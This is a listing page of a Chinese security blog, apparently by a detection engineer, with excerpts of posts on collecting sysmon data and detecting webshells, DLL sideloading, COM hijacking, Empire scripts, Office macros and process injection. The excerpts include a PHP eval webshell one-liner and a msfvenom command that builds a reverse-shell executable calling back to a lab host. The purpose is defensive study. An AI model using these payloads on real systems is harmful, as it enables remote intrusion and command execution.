会员
周边
新闻
博问
闪存
众包
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
将者,智、信、仁、勇、严也。
Hi,我是李智华,华为-安全AI算法专家,欢迎来到安全攻防对抗的有趣世界。
博客园
首页
新随笔
联系
订阅
管理
上一页
1
···
46
47
48
49
50
51
52
53
54
···
274
下一页
2022年4月26日
webshell后门中执行交互命令看到的sysmon数据采集和检测
摘要: 下载phpstudy,链接:https://public.xp.cn/upgrades/phpStudy_64.zip,如下图启动wnmp。 webshell内容: <?php echo "Your response is: ";?> <?php @eval($_GET['cmd']);?> 写入C
阅读全文
posted @ 2022-04-26 16:25 bonelee
阅读(218)
评论(0)
推荐(0)
2022年4月25日
DLL劫持——DLL sideloading 检测,4个检测点:同名DLL的覆盖(关键点),rundll32进程(关键点),cmd的父进程是rulldll32,rundll32出来一个tcp外联(有C2才算)!
摘要: https://flangvik.com/privesc/windows/bypass/2019/06/25/Sideload-like-your-an-APT.html 我是按照这个链接进行复现的,文章里使用的是notepad++,但是最新的notepad++已经没有了libcurl,所以我自己找
阅读全文
posted @ 2022-04-25 20:10 bonelee
阅读(428)
评论(0)
推荐(0)
2022年4月24日
针对高级持续威胁攻击的EDR评估——An Empirical Assessment of Endpoint Detection and Response Systems against Advanced Persistent Threats Attack Vectors,从攻击用例看,感觉这个评估叫APT攻击远远不够!!!内含crowdstrike内存扫描的做法,进程注入数据采集
摘要: https://www.mdpi.com/2624-800X/1/3/21/htm 软件翻译如下: 针对高级持续威胁攻击向量的端点检测和响应系统的实证评估 经过 乔治·卡兰查斯 1 和 康斯坦丁诺斯·帕萨基斯 1,2,* 1 比雷埃夫斯大学信息学系, 80 Karaoli & Dimitriou S
阅读全文
posted @ 2022-04-24 14:59 bonelee
阅读(1406)
评论(0)
推荐(0)
DLL劫持——DLL sideloading 这玩意从EDR检测厂商看,就S1有防护能力
摘要: Sideloading DLL攻击 2021年9月4日06:38:12逆向工程评论111 views787字阅读2分37秒阅读模式 今天看到了国外的一个白皮书,地址如下: https://res.mdpi.com/d_attachment/jcp/jcp-01-00021/article_deplo
阅读全文
posted @ 2022-04-24 14:45 bonelee
阅读(1228)
评论(0)
推荐(0)
微软kql检测——识别编码后的empire脚本
摘要: https://github.com/BlueTeamLabs/sentinel-attack/tree/master/detections ==》这个更全些 https://github.com/Azure/Azure-Sentinel/blob/83c6d8c7f65a5f209f39f3e06
阅读全文
posted @ 2022-04-24 11:05 bonelee
阅读(242)
评论(0)
推荐(0)
2022年4月22日
Persistence – COM Hijacking COM劫持和检测方法:反正检测注册表是必经之路 【能动手实践】
摘要: from:https://pentestlab.blog/2020/05/20/persistence-com-hijacking/?msclkid=5fdfee8bc15811ec8aa81df895acc3e4 Microsoft introduced Component Object Mode
阅读全文
posted @ 2022-04-22 14:51 bonelee
阅读(450)
评论(0)
推荐(0)
2022年4月21日
metasploit进程注入 sysmon事件采集示例
摘要: 生成payload:msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.136 LPORT=9876 -k -x /usr/share/windows-binaries/radmin.exe -f exe -o r2admin.exe靶机运行r2
阅读全文
posted @ 2022-04-21 15:44 bonelee
阅读(198)
评论(0)
推荐(0)
VirtualBox配置kali 让宿主机可以SSH远程登录虚拟机 vb真难用啊 粘贴板双向死活配置不好 只能这样共享文件了
摘要: 补充:kali里两个虚拟机之间互相访问设置,https://blog.csdn.net/elie_yang/article/details/88895660,就只需要设置下桥接网络就行! kali里: sudo vi /etc/network/interfaces添加: auto eth0 ifac
阅读全文
posted @ 2022-04-21 10:37 bonelee
阅读(244)
评论(0)
推荐(0)
2022年4月20日
恶意代码分析之Office宏代码分析——因为现在大部分的office CDE或者AV引擎都可以检测,EDR能做的比较有限了
摘要: 持久化:Office 应用程序启动 子技术 (6) 对手可能会利用基于 Microsoft Office 的应用程序在初创公司之间保持持久性。Microsoft Office 是企业网络中基于 Windows 的操作系统上相当常见的应用程序套件。启动基于 Office 的应用程序时,有多种机制可用于
阅读全文
posted @ 2022-04-20 18:55 bonelee
阅读(1324)
评论(0)
推荐(1)
2022年4月19日
进程注入数据采集,sysmon可以获得CreateRemoteThread信息,car中进程注入检测方式
摘要: 下载地址:https://www.tarasco.org/security/Process_Injector/processinjector.zip 进程注入(pinjector.exe)提权进程注入将pinjector注入到用户的进程里一起运行,进而同时拥有了对应的权限。是一种比较隐蔽的手段,不会
阅读全文
posted @ 2022-04-19 20:22 bonelee
阅读(503)
评论(0)
推荐(0)
上一页
1
···
46
47
48
49
50
51
52
53
54
···
274
下一页
公告